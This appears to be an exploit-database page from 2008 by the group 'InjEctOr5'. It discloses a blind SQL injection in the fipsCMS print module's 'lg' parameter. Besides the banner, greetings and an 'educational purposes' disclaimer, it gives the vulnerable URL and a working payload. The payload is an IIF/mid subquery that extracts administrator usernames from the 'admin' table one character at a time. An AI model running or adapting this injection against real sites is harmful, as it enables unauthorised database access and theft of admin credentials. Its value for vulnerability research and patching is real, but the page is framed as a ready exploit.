fipsCMS (print.asp lg) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : fipsCMS (print.asp lg) Remote SQL Injection Vulnerability
# Published : 2008-05-07
# Author : InjEctOr5
# Previous Title : miniBloggie 1.0 (del.php) Arbitrary Delete Post Vulnerability
# Next Title : Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /'             __  /'__`        / __  /'__`       /  ___    |
|  /_,     ___   /_/_L     ___  ,_/ /   _ __  __/    |
|  /_/  /' _ ` / /_/__<_  /'___  /    /`'__ ___``  |
|       / /    / L / __/  _  _   / / L  |
|       _ _ __   ____/ ____\ __\ ____/ _   ____/ |
|       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/   /___/  |
|                   ____/ >> Kings of injection                      |
|                   /___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

Title :: Blind SQL Injection
 
Author :: InjEctOr [s0f (at) w (dot) cn] && Hak3r-b0y [hak3r-b0y (at) hotmail (dot) com]

Application :: fipsCMS [Print Module]
 
Download :: http://www.fipsasp.com/home/index.asp?lg=1&w=pages&r=52&pid=73 

Dork 1 ::  Use ur mind !
 
ShoutZ :: Allah ,xError,ProViDor,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers

Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.

--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http://localhost/fipsCMS/modules/print.asp?lg=[SQL]

Example : //IIF((select%20mid(last(username),1,1)%20
from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko')

 
-------------------------------------------[End of  context]----------------------------------------

# www.Syue.com [2008-05-07]